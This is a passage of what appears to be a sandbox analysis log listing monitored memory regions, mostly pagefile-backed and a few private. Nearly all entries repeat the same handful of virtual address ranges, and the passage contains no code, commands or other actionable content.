"" Region: id = 12459 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12460 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12461 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12462 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12463 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12464 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12465 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12466 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12467 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12468 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12469 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12470 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12471 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12472 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12473 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12474 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12475 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12476 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12477 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12478 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12479 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12480 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12481 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12482 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12483 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12484 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12485 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12486 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12487 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12488 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12489 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12490 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12491 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12492 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12493 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12494 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12495 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 12496 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 12497 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12498 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12499 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12500 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12501 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12502 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12503 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12504 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12505 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12506 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12507 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12508 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12509 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12510 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12511 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12512 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12513 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12514 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12515 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12516 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12517 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12518 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12519 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12520 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12521 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12522 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12523 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12524 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12525 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12526 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12527 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12528 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12529 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12530 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12531 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12532 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12533 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12534 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12535 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12536 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12537 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12538 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12539 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12540 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12541 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12542 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12543 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12544 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12545 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12546 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12547 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12548 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12549 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12550 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12551 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12552 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12553 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12554 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12555 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12556 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12557 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12558 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12559 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12560 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12561 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 12562 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 12563 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12564 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12565 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 12566 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 12567 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12568 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12569 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12570 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12571 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12572 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12573 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12574 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12575 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12576 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12577 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12578 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12579 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12580 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12581 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 12582 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 12583 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12584 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12585 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12586 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12587 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12588 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12589 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12590 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12591 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12592 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12593 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12594 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12595 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12596 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12597 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12598 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12599 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12600 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12601 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12602 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12603 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12604 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12605 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12606 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12607 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12608 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12609 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12610 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12611 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12612 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12613 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12614 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12615 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12616 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12617 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12618 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12619 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12620 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12621 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12622 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12623 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12624 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12625 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12626 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12627 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12628 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12629 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12630 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12631 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12632 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12633 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12634 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12635 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12636 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12637 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12638 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12639 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12640 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12641 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 12642 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 12643 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12644 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 